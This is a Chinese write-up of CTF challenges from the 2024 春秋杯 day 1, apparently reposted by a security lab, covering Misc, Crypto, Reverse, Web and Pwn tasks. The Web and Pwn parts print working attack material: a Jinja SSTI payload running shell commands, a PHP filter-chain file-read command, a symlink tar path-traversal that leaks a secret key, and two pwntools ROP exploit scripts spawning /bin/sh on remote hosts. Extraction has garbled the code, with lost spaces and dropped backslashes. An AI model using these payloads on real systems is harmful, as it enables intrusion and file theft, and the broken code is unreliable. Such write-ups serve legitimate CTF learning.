Misc
See anything in these pics?
爆破压缩包,密码是5FIVE
Foremost提取出来一张黑色的png
然后爆破宽高,我用的是https://github.com/AabyssZG/Deformed-Image-Restorer
简单镜像提取
使用神秘小工具一键导出所有文件
出来一个zip,解压得到img,用rrstudio恢复之后得到一个xls,打开得到flag:flag{E7A10C15E26AA5750070EF756AAA1F7C}
压力大,写个脚本吧
用下面的脚本直接批量解压
import zipfile
import os
import base64
current_dir = os.getcwd()
for i inrange(99, 0, -1):
password_file = os.path.join(current_dir, f"password_{i}.txt")
zip_file = os.path.join(current_dir, f"zip_{i}.zip")
withopen(password_file, "r") as f:
encoded_password = f.read().strip()
password = base64.b64decode(encoded_password).decode("utf-8") #
with zipfile.ZipFile(zip_file) as zf:
zf.extractall(path=current_dir, pwd=password.encode("utf-8"))
然后合并全部txt,删掉最后的FGFGFG,再base64解码,最后16进制转图片得到一个二维码
https://rd.wechat.com/qrcode/confirm?block_type=101&content=flag%7B%5FPASSWORDs%5Fis%5Ffl%40g%21%5F%7D
简单算术
异或
Crypto
你是小哈斯?
Sha1,直接爆破就行,我驯服GPT写的
4a0a19218e082a343a1b17e5333409af9d98f0f5 => f
07c342be6e560e7f43842e2e21b774e61d85f047 => l
86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 => a
54fd1711209fb1c0781092374132c66e79e2241b => g
60ba4b2daa4ed4d070fec06687e249e0e6f9ee45 => {
54fd1711209fb1c0781092374132c66e79e2241b => g
86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 => a
6b0d31c0d563223024da45691584643ac78c96e8 => m
58e6b3a414a1e090dfc6029add0f3555ccba127f => e
53a0acfad59379b3e050338bf9f23cfc172ee787 => _
84a516841ba77a5b4648de2cd0dfcb30ea46dbb4 => c
22ea1c649c82946aa6e479e1ffd321e4a318b1b0 => q
e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98 => b
53a0acfad59379b3e050338bf9f23cfc172ee787 => _
042dc4512fa3d391c5170cf3aa61e6a638f84342 => i
a0f1490a20d0211c997b44bc357e1972deab8ae3 => s
042dc4512fa3d391c5170cf3aa61e6a638f84342 => i
a0f1490a20d0211c997b44bc357e1972deab8ae3 => s
53a0acfad59379b3e050338bf9f23cfc172ee787 => _
84a516841ba77a5b4648de2cd0dfcb30ea46dbb4 => c
11f6ad8ec52a2984abaafd7c3b516503785c2072 => x
95cb0bfd2977c761298d9624e4b4d4c72a39974a => y
395df8f7c51f007019cb30201c49e884b46b92fa => z
c2b7df6201fdd3362399091f0a29550df3505b6a => }
flag{game_cqb_isis_cxyz}
通往哈希的旅程
ca12fd8250972ec363a16593356abb1f3cf3a16d
cmd5花重金买的
18876011645
Reverse
Ezgo
爆破即可,最后密码是oadi,密码正确以后zip中的txt就可读了(有时候会失败,要重新解压重新输入密码,貌似2025也可以,应该算个非预期(?))
Web
file_copy
直接用
https://github.com/synacktiv/php_filter_chains_oracle_exploit
python3 filters_chain_oracle_exploit.py --target url --file '/flag' --parameter path
这个只能在linux下跑,windows会报错,且Linux回显很慢
easy_flask
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /app/flag').read() }}
ssti注入(希望出题人声明flag位置,我/flag读不到 env也没有差点破防了)
Gotar
Tar路径穿越
先软连接构造一个恶意tar
mkdir 1
cd 1
ln -s ../../../.env 2
cd ../
tar -cf 3.tar 1
上传3.tar,得到真正的密钥,如下:
SfaVqVGfLOKk7Gp912kPe0Li47AEQM4iYNbBx1WVrWA=
看token,是个jwt
然后直接塞hackbar并读取flag
Pwn
Gender_Simulation
from pwn import *
binary = './pwn'
elf = ELF(binary)
libc = ELF('./libc.so.6')
context.log_level = 'debug'
context.arch = elf.arch
context.terminal = ['tmux', 'neww']
send = lambda data: io.send(data)
send_after = lambda delim, data: io.sendafter(delim, data)
send_line = lambda data: io.sendline(data)
send_line_after = lambda delim, data: io.sendlineafter(delim, data)
recv = lambda num_bytes=4096: io.recv(num_bytes)
recv_until = lambda delims, drop=True: io.recvuntil(delims, drop)
u32 = lambda data: u32(data.ljust(4, b'x00'))
u64 = lambda data: u64(data.ljust(8, b'x00'))
interactive = lambda: io.interactive()
io = remote('39.106.48.123', 38698)
recv_until(b'A gift: ')
leaked_addr = int(recv_until(b'n'), 16)
libc_base = leaked_addr - libc.sym.setvbuf
log.info(f"libc_base = {hex(libc_base)}")
recv_until(b'Choose onen1. Boyn2. Girln')
send_line(b'2')
recv_until(b'2. Tomboyn')
send_line(b'2')
recv_until(b'certificaten')
pop_rdi = libc_base + 0x000000000010f75b
ret_addr = 0x000000000040201a
system_addr = libc.sym.system + libc_base
bin_sh_addr = next(libc.search(b'/bin/sh')) + libc_base
send_line(p64(0x0004025E6))
recv_until(b'If you think you')
send(b'a' * 0x18 + p64(pop_rdi) + p64(bin_sh_addr) + p64(ret_addr) + p64(system_addr))
interactive()
Bypass
from pwn import *
import time
local_file = './pwn'
elf = ELF(local_file)
libc = ELF('./libc.so.6')
context.log_level = 'debug'
context.arch = elf.arch
context.terminal = ['tmux', 'neww']
send = lambda data: io.send(data)
send_after = lambda delim, data: io.sendafter(delim, data)
send_line = lambda data: io.sendline(data)
send_line_after = lambda delim, data: io.sendlineafter(delim, data)
recv = lambda numb=4096: io.recv(numb)
recv_until = lambda delims, drop=True: io.recvuntil(delims, drop)
unpack32 = lambda data: u32(data.ljust(4, b'x00'))
unpack64 = lambda data: u64(data.ljust(8, b'x00'))
get_qword = lambda data: (~np.uint64(data) + 1)
get_dword = lambda data: (~np.uint32(data) + 1)
defget_shell():
return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))
info_address = lambda tag, addr: io.info(tag + '==>' + ': {:#x}'.format(addr))
interact = lambda: io.interactive()
io = remote('8.147.132.32', 39949)
send(p8(2) * 4)
recv_until('d')
recv_until('n')
libc_base = unpack64(recv(6)) - libc.sym.puts
send(p8(0) * 4)
one_gadget = 0x4f302
send(b'KEY: ' + b'a' * 19 + p8(0x14) + p8(0x2) + b'c' * 8 + p64(one_gadget + libc_base))
time.sleep(0.1)
send(b'VAL: ' + b'b' * 512)
interact()
团队官网:https://www.hdsec.cn/
我们在https://www.hdsec.cn/tools/intranet/intranet.html收集了大量渗透中会用到的命令,欢迎各位师傅使用
原文始发于微信公众号(黄豆安全实验室):2024春秋杯day1 WP
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论